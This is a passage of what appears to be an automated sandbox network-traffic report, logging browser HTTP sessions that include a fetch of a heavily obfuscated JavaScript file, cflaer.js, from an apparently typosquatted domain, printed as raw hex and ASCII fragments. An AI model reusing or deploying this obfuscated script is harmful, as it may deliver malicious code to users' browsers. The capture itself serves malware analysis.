                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 5f 30 78 37 62 33 35 33 35 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 38 63 39 63 28 5f 30 78 34 64 66 34 64 61 2c 5f 30 78 35 63 61 61 36 66 2c 5f 30 78 35 37 64 66 66 61 2c 5f 30 78 33 62 66 33 38 33 2c 5f 30 78 35 66 32 36 31 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 31 62 66 28 5f 30 78 35 37 64 66 66 61 2d 30 78 33 64 64 2c 5f 30 78 33 62 66 33 38 33 29 3b 7d 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 65 31 30 64 31 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 61 35 64 63 35 28 30 78 31 66 34 62 2c 30 78 32 61 37 36 2c 30 78 33 63 65 61 2c 27 39 74 72 70 27 2c 30 78 32 64 61 62 29 29 2f 28 2d 30 78 31 33 65 64 2b 2d 30 78 35 63 63 2b 30 78 63 64 64 2a 30 78 32 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 61
                                                                                                                                                                                            Data Ascii: _0x7b3535);}function _0x3e8c9c(_0x4df4da,_0x5caa6f,_0x57dffa,_0x3bf383,_0x5f2612){return _0x31bf(_0x57dffa-0x3dd,_0x3bf383);}while(!![]){try{const _0x5e10d1=parseInt(_0x5a5dc5(0x1f4b,0x2a76,0x3cea,'9trp',0x2dab))/(-0x13ed+-0x5cc+0xcdd*0x2)*(parseInt(_0x5a
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 74 69 6f 6e 28 5f 30 78 32 30 61 35 37 66 2c 5f 30 78 35 65 34 61 38 37 2c 5f 30 78 31 61 35 38 35 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 61 35 37 66 28 5f 30 78 35 65 34 61 38 37 2c 5f 30 78 31 61 35 38 35 63 29 3b 7d 2c 27 47 68 47 53 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 38 32 30 38 33 2c 5f 30 78 34 61 39 30 39 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 38 32 30 38 33 28 5f 30 78 34 61 39 30 39 64 29 3b 7d 2c 27 54 6b 4d 6b 63 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 61 66 32 36 2c 5f 30 78 32 38 61 30 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 66 61 66 32 36 3e 3d 5f 30 78 32 38 61 30 35 65 3b 7d 2c 27 41 5a 4e 75 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 34 30 30 31 2c 5f 30 78 31 35 63 64 38 63 29 7b 72 65 74 75 72
                                                                                                                                                                                            Data Ascii: tion(_0x20a57f,_0x5e4a87,_0x1a585c){return _0x20a57f(_0x5e4a87,_0x1a585c);},'GhGSZ':function(_0x482083,_0x4a909d){return _0x482083(_0x4a909d);},'TkMkc':function(_0x3faf26,_0x28a05e){return _0x3faf26>=_0x28a05e;},'AZNuR':function(_0x104001,_0x15cd8c){retur
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 32 37 37 2c 30 78 31 35 66 36 2c 30 78 31 66 34 38 2c 27 4b 6c 32 63 27 29 2b 5f 30 78 31 36 61 61 36 35 28 2d 30 78 38 66 36 2c 30 78 33 35 66 2c 30 78 34 33 33 2c 27 71 32 33 6b 27 2c 2d 30 78 37 33 62 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 31 35 38 35 2c 27 50 4b 64 41 27 2c 30 78 32 38 34 62 2c 30 78 31 39 65 31 2c 30 78 31 36 38 37 29 2b 5f 30 78 33 63 30 61 32 62 28 30 78 65 36 39 2c 30 78 31 31 61 65 2c 27 41 4e 47 58 27 2c 30 78 32 37 36 37 2c 30 78 39 37 64 29 2b 5f 30 78 32 35 30 35 65 34 28 30 78 31 36 39 32 2c 30 78 65 34 64 2c 30 78 62 64 62 2c 30 78 32 63 31 33 2c 27 64 78 58 64 27 29 2b 5f 30 78 31 36 61 61 36 35 28 30 78 32 31 66 33 2c 30 78 38 61 32 2c 30 78 37 64 62 2c 27 59 46 77 66 27 2c 30 78 36 30 65 29 2c 27 74 48 78 6c 43 27 3a
                                                                                                                                                                                            Data Ascii: 277,0x15f6,0x1f48,'Kl2c')+_0x16aa65(-0x8f6,0x35f,0x433,'q23k',-0x73b)+_0x5ef29a(0x1585,'PKdA',0x284b,0x19e1,0x1687)+_0x3c0a2b(0xe69,0x11ae,'ANGX',0x2767,0x97d)+_0x2505e4(0x1692,0xe4d,0xbdb,0x2c13,'dxXd')+_0x16aa65(0x21f3,0x8a2,0x7db,'YFwf',0x60e),'tHxlC':
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 78 33 36 38 62 30 30 29 3b 7d 2c 27 75 42 52 42 75 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 32 64 35 63 2c 5f 30 78 34 39 64 32 31 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 35 32 64 35 63 2b 5f 30 78 34 39 64 32 31 65 3b 7d 2c 27 7a 46 65 63 42 27 3a 5f 30 78 33 63 30 61 32 62 28 30 78 66 61 65 2c 2d 30 78 36 66 32 2c 27 42 5a 21 36 27 2c 30 78 32 34 36 35 2c 30 78 31 61 66 39 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 66 36 2c 27 71 32 33 6b 27 2c 30 78 39 30 62 2c 30 78 61 30 33 2c 30 78 31 38 64 61 29 2b 5f 30 78 33 63 30 61 32 62 28 30 78 33 35 34 33 2c 30 78 34 39 35 38 2c 27 70 79 54 30 27 2c 30 78 32 61 39 36 2c 30 78 32 62 38 65 29 2b 5f 30 78 35 37 66 62 32 63 28 27 57 74 30 51 27 2c 30 78 32 36 39 38 2c 30 78 31 36 65 66 2c 30 78 31 63 65
                                                                                                                                                                                            Data Ascii: x368b00);},'uBRBu':function(_0x152d5c,_0x49d21e){return _0x152d5c+_0x49d21e;},'zFecB':_0x3c0a2b(0xfae,-0x6f2,'BZ!6',0x2465,0x1af9)+_0x5ef29a(0xf6,'q23k',0x90b,0xa03,0x18da)+_0x3c0a2b(0x3543,0x4958,'pyT0',0x2a96,0x2b8e)+_0x57fb2c('Wt0Q',0x2698,0x16ef,0x1ce
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 3a 5f 30 78 31 36 61 61 36 35 28 30 78 31 36 66 30 2c 30 78 36 39 62 2c 30 78 31 31 34 31 2c 27 6c 6a 6b 29 27 2c 30 78 31 63 64 29 2b 5f 30 78 31 36 61 61 36 35 28 30 78 33 38 33 35 2c 30 78 33 32 64 34 2c 30 78 33 31 30 35 2c 27 50 4b 64 41 27 2c 30 78 33 64 64 61 29 2c 27 51 56 6c 71 46 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 39 64 32 64 65 2c 5f 30 78 32 65 64 32 65 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 39 64 32 64 65 2b 5f 30 78 32 65 64 32 65 33 3b 7d 2c 27 63 55 4b 56 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 39 32 38 33 36 2c 5f 30 78 33 31 30 30 64 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 37 39 32 38 33 36 2b 5f 30 78 33 31 30 30 64 62 3b 7d 2c 27 57 7a 78 75 66 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 63 39 37 62 36 2c 5f 30 78
                                                                                                                                                                                            Data Ascii: :_0x16aa65(0x16f0,0x69b,0x1141,'ljk)',0x1cd)+_0x16aa65(0x3835,0x32d4,0x3105,'PKdA',0x3dda),'QVlqF':function(_0x39d2de,_0x2ed2e3){return _0x39d2de+_0x2ed2e3;},'cUKVR':function(_0x792836,_0x3100db){return _0x792836+_0x3100db;},'Wzxuf':function(_0x2c97b6,_0x
                                                                                                                                                                                            2024-11-18 20:00:13 UTC1369INData Raw: 2c 5f 30 78 32 30 37 37 65 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 37 31 32 63 34 28 5f 30 78 32 34 62 62 37 30 2c 5f 30 78 31 33 66 63 37 32 2c 5f 30 78 32 30 37 37 65 34 29 3b 7d 2c 27 61 67 53 61 4e 27 3a 5f 30 78 31 36 61 61 36 35 28 2d 30 78 38 31 33 2c 30 78 36 66 31 2c 30 78 31 65 34 39 2c 27 58 6f 28 70 27 2c 30 78 34 66 65 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 32 31 38 37 2c 27 42 5a 21 36 27 2c 30 78 31 39 61 39 2c 30 78 32 66 38 62 2c 30 78 31 65 30 63 29 2b 27 77 6e 27 2c 27 4c 56 6a 49 55 27 3a 5f 30 78 32 35 30 35 65 34 28 30 78 32 30 66 30 2c 30 78 33 37 36 62 2c 30 78 32 33 35 34 2c 30 78 31 66 65 66 2c 27 24 5d 35 73 27 29 2c 27 47 77 57 6d 42 27 3a 5f 30 78 31 36 61 61 36 35 28 30 78 31 35 39 62 2c 30 78 31 30 38 38 2c 2d 30 78 35
                                                                                                                                                                                            Data Ascii: ,_0x2077e4){return _0x2712c4(_0x24bb70,_0x13fc72,_0x2077e4);},'agSaN':_0x16aa65(-0x813,0x6f1,0x1e49,'Xo(p',0x4fe)+_0x5ef29a(0x2187,'BZ!6',0x19a9,0x2f8b,0x1e0c)+'wn','LVjIU':_0x2505e4(0x20f0,0x376b,0x2354,0x1fef,'$]5s'),'GwWmB':_0x16aa65(0x159b,0x1088,-0x5


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            113192.168.2.1649846188.114.96.34436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:14 UTC347OUTGET /cflaer.js HTTP/1.1
                                                                                                                                                                                            Host: bcbshieldn.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:14 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:14 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 08:21:38 GMT
                                                                                                                                                                                            ETag: W/"673af912-e7681"
                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                            Age: 3397
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FFPb70kQGV%2BYze9jMUTeyOuBRNn16tIs4V4EacdY7xyH7yaPeUMzNdRmiEzdvzVZhSzaqVEHbqBJJEhHIY7oDvjzsPzoLIWPrgFh6bDNekoiOFIfmgBcIegLptJlTp3yA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e4a8bac5a9f2d70-ORD
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24406&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=925&delivery_rate=118489&cwnd=32&unsent_bytes=0&cid=108a6af866a9cdc0&ts=176&x=0"
                                                                                                                                                                                            2024-11-18 20:00:14 UTC486INData Raw: 37 63 65 39 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 31 62 66 28 5f 30 78 31 30 37 38 33 65 2c 5f 30 78 33 35 36 63 35 61 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 38 61 34 61 3d 5f 30 78 32 34 32 61 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 31 62 66 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 65 38 31 35 31 2c 5f 30 78 33 62 34 33 33 31 29 7b 5f 30 78 31 65 38 31 35 31 3d 5f 30 78 31 65 38 31 35 31 2d 28 2d 30 78 35 2a 30 78 34 30 31 2b 2d 30 78 31 62 39 64 2a 30 78 31 2b 30 78 33 31 37 37 29 3b 6c 65 74 20 5f 30 78 35 37 38 34 62 37 3d 5f 30 78 33 33 38 61 34 61 5b 5f 30 78 31 65 38 31 35 31 5d 3b 69 66 28 5f 30 78 33 31 62 66 5b 27 45 6f 56 49 4c 4c 27 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 5f 30 78 38 38 32 31 31 32 3d 66 75 6e 63 74
                                                                                                                                                                                            Data Ascii: 7ce9function _0x31bf(_0x10783e,_0x356c5a){const _0x338a4a=_0x242a();return _0x31bf=function(_0x1e8151,_0x3b4331){_0x1e8151=_0x1e8151-(-0x5*0x401+-0x1b9d*0x1+0x3177);let _0x5784b7=_0x338a4a[_0x1e8151];if(_0x31bf['EoVILL']===undefined){var _0x882112=funct
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 66 31 35 3d 2d 30 78 39 37 31 2a 30 78 31 2b 30 78 33 32 2a 2d 30 78 62 62 2b 30 78 32 64 66 37 3b 5f 30 78 34 30 39 33 31 63 3d 5f 30 78 32 62 65 37 39 34 5b 27 63 68 61 72 41 74 27 5d 28 5f 30 78 33 37 65 66 31 35 2b 2b 29 3b 7e 5f 30 78 34 30 39 33 31 63 26 26 28 5f 30 78 33 62 62 30 63 39 3d 5f 30 78 33 64 65 39 37 34 25 28 2d 30 78 31 33 38 37 2b 2d 30 78 31 62 65 33 2b 30 78 32 66 36 65 29 3f 5f 30 78 33 62 62 30 63 39 2a 28 2d 30 78 33 2a 2d 30 78 34 34 66 2b 2d 30 78 32 36 31 39 2b 30 78 31 39 36 63 29 2b 5f 30 78 34 30 39 33 31 63 3a 5f 30 78 34 30 39 33 31 63 2c 5f 30 78 33 64 65 39 37 34 2b 2b 25 28 30 78 35 64 39 2a 2d 30 78 32 2b 2d 30 78 31 66 62 66 2b 30 78 31 2a 30 78 32 62 37 35 29 29 3f 5f 30 78 31 62 62 34 66 30 2b 3d 5f 30 78 31 31 36
                                                                                                                                                                                            Data Ascii: f15=-0x971*0x1+0x32*-0xbb+0x2df7;_0x40931c=_0x2be794['charAt'](_0x37ef15++);~_0x40931c&&(_0x3bb0c9=_0x3de974%(-0x1387+-0x1be3+0x2f6e)?_0x3bb0c9*(-0x3*-0x44f+-0x2619+0x196c)+_0x40931c:_0x40931c,_0x3de974++%(0x5d9*-0x2+-0x1fbf+0x1*0x2b75))?_0x1bb4f0+=_0x116
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 30 78 31 30 36 63 62 65 3d 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 31 34 37 33 31 66 5d 2c 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 31 34 37 33 31 66 5d 3d 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 35 34 63 36 34 31 5d 2c 5f 30 78 33 61 63 37 65 36 5b 5f 30 78 35 34 63 36 34 31 5d 3d 5f 30 78 31 30 36 63 62 65 3b 7d 5f 30 78 31 34 37 33 31 66 3d 30 78 32 36 34 62 2a 2d 30 78 31 2b 2d 30 78 32 30 66 66 2b 2d 30 78 37 64 2a 2d 30 78 39 32 2c 5f 30 78 35 34 63 36 34 31 3d 30 78 31 35 34 38 2b 30 78 31 37 35 64 2b 2d 30 78 32 63 61 35 2a 30 78 31 3b 66 6f 72 28 6c 65 74 20 5f 30 78 64 33 34 63 39 65 3d 2d 30 78 31 39 39 2b 2d 30 78 32 62 2a 2d 30 78 37 31 2b 2d 30 78 31 31 36 32 3b 5f 30 78 64 33 34 63 39 65 3c 5f 30 78 35 38 61 64 33 31 5b 27 6c 65 6e 67 74 68 27
                                                                                                                                                                                            Data Ascii: 0x106cbe=_0x3ac7e6[_0x14731f],_0x3ac7e6[_0x14731f]=_0x3ac7e6[_0x54c641],_0x3ac7e6[_0x54c641]=_0x106cbe;}_0x14731f=0x264b*-0x1+-0x20ff+-0x7d*-0x92,_0x54c641=0x1548+0x175d+-0x2ca5*0x1;for(let _0xd34c9e=-0x199+-0x2b*-0x71+-0x1162;_0xd34c9e<_0x58ad31['length'
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 30 31 32 63 62 3d 5f 30 78 32 63 36 66 36 35 5b 27 74 65 73 74 27 5d 28 74 68 69 73 5b 27 65 71 69 53 4b 77 27 5d 5b 27 74 6f 53 74 72 69 6e 67 27 5d 28 29 29 3f 2d 2d 74 68 69 73 5b 27 47 52 4a 78 58 7a 27 5d 5b 30 78 32 2a 2d 30 78 62 65 37 2b 30 78 35 2a 2d 30 78 33 39 2b 30 78 63 37 36 2a 30 78 32 5d 3a 2d 2d 74 68 69 73 5b 27 47 52 4a 78 58 7a 27 5d 5b 30 78 31 2a 30 78 31 34 62 33 2b 30 78 32 39 61 2a 30 78 34 2b 2d 30 78 31 2a 30 78 31 66 31 62 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 5b 27 79 52 4b 77 4f 6a 27 5d 28 5f 30 78 32 30 31 32 63 62 29 3b 7d 2c 5f 30 78 34 39 30 63 32 37 5b 27 70 72 6f 74 6f 74 79 70 65 27 5d 5b 27 79 52 4b 77 4f 6a 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 37 66 34 65 29 7b 69 66 28 21 42 6f 6f 6c 65 61 6e 28 7e
                                                                                                                                                                                            Data Ascii: 012cb=_0x2c6f65['test'](this['eqiSKw']['toString']())?--this['GRJxXz'][0x2*-0xbe7+0x5*-0x39+0xc76*0x2]:--this['GRJxXz'][0x1*0x14b3+0x29a*0x4+-0x1*0x1f1b];return this['yRKwOj'](_0x2012cb);},_0x490c27['prototype']['yRKwOj']=function(_0x3a7f4e){if(!Boolean(~
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 38 63 39 63 28 5f 30 78 34 64 66 34 64 61 2c 5f 30 78 35 63 61 61 36 66 2c 5f 30 78 35 37 64 66 66 61 2c 5f 30 78 33 62 66 33 38 33 2c 5f 30 78 35 66 32 36 31 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 31 62 66 28 5f 30 78 35 37 64 66 66 61 2d 30 78 33 64 64 2c 5f 30 78 33 62 66 33 38 33 29 3b 7d 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 65 31 30 64 31 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 61 35 64 63 35 28 30 78 31 66 34 62 2c 30 78 32 61 37 36 2c 30 78 33 63 65 61 2c 27 39 74 72 70 27 2c 30 78 32 64 61 62 29 29 2f 28 2d 30 78 31 33 65 64 2b 2d 30 78 35 63 63 2b 30 78 63 64 64 2a 30 78 32 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 61 35 64 63 35 28 30 78 31 66
                                                                                                                                                                                            Data Ascii: );}function _0x3e8c9c(_0x4df4da,_0x5caa6f,_0x57dffa,_0x3bf383,_0x5f2612){return _0x31bf(_0x57dffa-0x3dd,_0x3bf383);}while(!![]){try{const _0x5e10d1=parseInt(_0x5a5dc5(0x1f4b,0x2a76,0x3cea,'9trp',0x2dab))/(-0x13ed+-0x5cc+0xcdd*0x2)*(parseInt(_0x5a5dc5(0x1f
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 30 61 35 37 66 2c 5f 30 78 35 65 34 61 38 37 2c 5f 30 78 31 61 35 38 35 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 61 35 37 66 28 5f 30 78 35 65 34 61 38 37 2c 5f 30 78 31 61 35 38 35 63 29 3b 7d 2c 27 47 68 47 53 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 38 32 30 38 33 2c 5f 30 78 34 61 39 30 39 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 38 32 30 38 33 28 5f 30 78 34 61 39 30 39 64 29 3b 7d 2c 27 54 6b 4d 6b 63 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 61 66 32 36 2c 5f 30 78 32 38 61 30 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 66 61 66 32 36 3e 3d 5f 30 78 32 38 61 30 35 65 3b 7d 2c 27 41 5a 4e 75 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 34 30 30 31 2c 5f 30 78 31 35 63 64 38 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 30 34 30
                                                                                                                                                                                            Data Ascii: 0a57f,_0x5e4a87,_0x1a585c){return _0x20a57f(_0x5e4a87,_0x1a585c);},'GhGSZ':function(_0x482083,_0x4a909d){return _0x482083(_0x4a909d);},'TkMkc':function(_0x3faf26,_0x28a05e){return _0x3faf26>=_0x28a05e;},'AZNuR':function(_0x104001,_0x15cd8c){return _0x1040
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 36 2c 30 78 31 66 34 38 2c 27 4b 6c 32 63 27 29 2b 5f 30 78 31 36 61 61 36 35 28 2d 30 78 38 66 36 2c 30 78 33 35 66 2c 30 78 34 33 33 2c 27 71 32 33 6b 27 2c 2d 30 78 37 33 62 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 31 35 38 35 2c 27 50 4b 64 41 27 2c 30 78 32 38 34 62 2c 30 78 31 39 65 31 2c 30 78 31 36 38 37 29 2b 5f 30 78 33 63 30 61 32 62 28 30 78 65 36 39 2c 30 78 31 31 61 65 2c 27 41 4e 47 58 27 2c 30 78 32 37 36 37 2c 30 78 39 37 64 29 2b 5f 30 78 32 35 30 35 65 34 28 30 78 31 36 39 32 2c 30 78 65 34 64 2c 30 78 62 64 62 2c 30 78 32 63 31 33 2c 27 64 78 58 64 27 29 2b 5f 30 78 31 36 61 61 36 35 28 30 78 32 31 66 33 2c 30 78 38 61 32 2c 30 78 37 64 62 2c 27 59 46 77 66 27 2c 30 78 36 30 65 29 2c 27 74 48 78 6c 43 27 3a 5f 30 78 33 63 30 61 32 62
                                                                                                                                                                                            Data Ascii: 6,0x1f48,'Kl2c')+_0x16aa65(-0x8f6,0x35f,0x433,'q23k',-0x73b)+_0x5ef29a(0x1585,'PKdA',0x284b,0x19e1,0x1687)+_0x3c0a2b(0xe69,0x11ae,'ANGX',0x2767,0x97d)+_0x2505e4(0x1692,0xe4d,0xbdb,0x2c13,'dxXd')+_0x16aa65(0x21f3,0x8a2,0x7db,'YFwf',0x60e),'tHxlC':_0x3c0a2b
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 7d 2c 27 75 42 52 42 75 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 32 64 35 63 2c 5f 30 78 34 39 64 32 31 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 35 32 64 35 63 2b 5f 30 78 34 39 64 32 31 65 3b 7d 2c 27 7a 46 65 63 42 27 3a 5f 30 78 33 63 30 61 32 62 28 30 78 66 61 65 2c 2d 30 78 36 66 32 2c 27 42 5a 21 36 27 2c 30 78 32 34 36 35 2c 30 78 31 61 66 39 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 66 36 2c 27 71 32 33 6b 27 2c 30 78 39 30 62 2c 30 78 61 30 33 2c 30 78 31 38 64 61 29 2b 5f 30 78 33 63 30 61 32 62 28 30 78 33 35 34 33 2c 30 78 34 39 35 38 2c 27 70 79 54 30 27 2c 30 78 32 61 39 36 2c 30 78 32 62 38 65 29 2b 5f 30 78 35 37 66 62 32 63 28 27 57 74 30 51 27 2c 30 78 32 36 39 38 2c 30 78 31 36 65 66 2c 30 78 31 63 65 65 2c 30 78 32 66 38 65 29
                                                                                                                                                                                            Data Ascii: },'uBRBu':function(_0x152d5c,_0x49d21e){return _0x152d5c+_0x49d21e;},'zFecB':_0x3c0a2b(0xfae,-0x6f2,'BZ!6',0x2465,0x1af9)+_0x5ef29a(0xf6,'q23k',0x90b,0xa03,0x18da)+_0x3c0a2b(0x3543,0x4958,'pyT0',0x2a96,0x2b8e)+_0x57fb2c('Wt0Q',0x2698,0x16ef,0x1cee,0x2f8e)
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 35 28 30 78 31 36 66 30 2c 30 78 36 39 62 2c 30 78 31 31 34 31 2c 27 6c 6a 6b 29 27 2c 30 78 31 63 64 29 2b 5f 30 78 31 36 61 61 36 35 28 30 78 33 38 33 35 2c 30 78 33 32 64 34 2c 30 78 33 31 30 35 2c 27 50 4b 64 41 27 2c 30 78 33 64 64 61 29 2c 27 51 56 6c 71 46 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 39 64 32 64 65 2c 5f 30 78 32 65 64 32 65 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 39 64 32 64 65 2b 5f 30 78 32 65 64 32 65 33 3b 7d 2c 27 63 55 4b 56 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 39 32 38 33 36 2c 5f 30 78 33 31 30 30 64 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 37 39 32 38 33 36 2b 5f 30 78 33 31 30 30 64 62 3b 7d 2c 27 57 7a 78 75 66 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 63 39 37 62 36 2c 5f 30 78 32 63 65 61 37 65 29 7b 72
                                                                                                                                                                                            Data Ascii: 5(0x16f0,0x69b,0x1141,'ljk)',0x1cd)+_0x16aa65(0x3835,0x32d4,0x3105,'PKdA',0x3dda),'QVlqF':function(_0x39d2de,_0x2ed2e3){return _0x39d2de+_0x2ed2e3;},'cUKVR':function(_0x792836,_0x3100db){return _0x792836+_0x3100db;},'Wzxuf':function(_0x2c97b6,_0x2cea7e){r
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1369INData Raw: 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 37 31 32 63 34 28 5f 30 78 32 34 62 62 37 30 2c 5f 30 78 31 33 66 63 37 32 2c 5f 30 78 32 30 37 37 65 34 29 3b 7d 2c 27 61 67 53 61 4e 27 3a 5f 30 78 31 36 61 61 36 35 28 2d 30 78 38 31 33 2c 30 78 36 66 31 2c 30 78 31 65 34 39 2c 27 58 6f 28 70 27 2c 30 78 34 66 65 29 2b 5f 30 78 35 65 66 32 39 61 28 30 78 32 31 38 37 2c 27 42 5a 21 36 27 2c 30 78 31 39 61 39 2c 30 78 32 66 38 62 2c 30 78 31 65 30 63 29 2b 27 77 6e 27 2c 27 4c 56 6a 49 55 27 3a 5f 30 78 32 35 30 35 65 34 28 30 78 32 30 66 30 2c 30 78 33 37 36 62 2c 30 78 32 33 35 34 2c 30 78 31 66 65 66 2c 27 24 5d 35 73 27 29 2c 27 47 77 57 6d 42 27 3a 5f 30 78 31 36 61 61 36 35 28 30 78 31 35 39 62 2c 30 78 31 30 38 38 2c 2d 30 78 35 34 35 2c 27 64 78 58 64 27
                                                                                                                                                                                            Data Ascii: 4){return _0x2712c4(_0x24bb70,_0x13fc72,_0x2077e4);},'agSaN':_0x16aa65(-0x813,0x6f1,0x1e49,'Xo(p',0x4fe)+_0x5ef29a(0x2187,'BZ!6',0x19a9,0x2f8b,0x1e0c)+'wn','LVjIU':_0x2505e4(0x20f0,0x376b,0x2354,0x1fef,'$]5s'),'GwWmB':_0x16aa65(0x159b,0x1088,-0x545,'dxXd'


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            114192.168.2.164984966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1186OUTGET /assets/images/slideshow-pager.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
